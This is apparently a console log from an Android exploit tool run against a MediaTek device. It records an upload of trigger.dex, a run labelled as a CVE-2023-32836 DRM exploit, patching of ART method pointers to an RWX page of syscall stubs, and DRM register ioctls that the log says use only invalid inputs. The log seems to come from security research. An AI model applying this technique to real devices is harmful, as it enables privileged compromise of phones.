[*] local md5 f9d42e4866a6e272396d02c1ecb83a3f size 32352
    raw=31.6 KiB  b64=42.1 KiB  overhead=33%
    [##############################] 100%  42.1 KiB/42.1 KiB  700.2 KiB/s  done
[+] Upload: 42.1 KiB in 0.1s (698.1 KiB/s, 1 chunks)
[*] Decoding on device...
[*] remote size 32352
f9d42e4866a6e272396d02c1ecb83a3f  /data/data/com.android.settings/cache/trigger.dex
[*] CVE-2023-32836 DRM exploit (Java/dalvikvm)
[*] pid=26776 uid=1000 mode=mtkwriteguard
[*] === MTK private DRM write-guard probe (safe invalid inputs) ===

[*] Uses intentionally invalid register addresses/ids only.
[+] Scratch buffer at 0x7ec0cfc000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7ec0c00000
[+] Wrote syscall stubs: JNI@+0x00 (36B), Quick@+0x40 (36B)
[*] ArtMethod for nativeSyscall at 0x7c1cd04780
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x7c2d41a2c0
    entry_point    = 0x1038000812c03ca8
[*] Patching data_ (JNI) -> 0x7ec0c00000
[*] Patching entry_point (quick) -> 0x7ec0c00040
    data_       = 0x7ec0c00000 OK
    entry_point = 0x7ec0c00040 OK
[+] ArtMethod patched
[+] Syscall infrastructure ready

[*] openat /dev/dri/card0 ret=5
[*] MTK_WRITE_REG invalid pa=0xffffffff ret=-14 (EFAULT)
[*] MTK_READ_REG invalid pa=0xffffffff ret=-14 (EFAULT) val=0x0
[*] MTK_WRITE_SW_REG unknown reg_id=0x12345678 ret=0
[*] MTK_READ_SW_REG unknown reg_id=0x12345678 ret=0 val=0x0
[*] Done
